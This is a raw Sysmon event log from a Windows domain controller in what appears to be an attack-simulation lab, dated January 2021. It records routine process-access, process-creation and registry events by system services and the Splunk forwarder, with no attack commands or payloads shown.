154100x80000000000000004856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-901C-6005-0C01-00000000A301}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-901D-6005-0E01-00000000A301}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-901D-6005-0E01-00000000A301}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-901D-6005-0E01-00000000A301}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-901D-6005-0E01-00000000A301}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.848{59A5CD1D-8E46-6005-1400-00000000A301}13041784C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.708{59A5CD1D-8E46-6005-1400-00000000A301}13041784C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000004988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:41:59.583{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000000) 13241300x80000000000000004987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:41:59.583{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00077712) 13241300x80000000000000004986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:41:59.583{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed94-0xdc570b2a) 13241300x80000000000000004985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:41:59.583{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ed9d-0x3e1b732a) 13241300x80000000000000004984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:41:59.583{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6eda5-0x9fdfdb2a) 10341000x80000000000000004983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E58-6005-4000-00000000A301}3784C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E57-6005-3500-00000000A301}3248C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-3300-00000000A301}2756C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 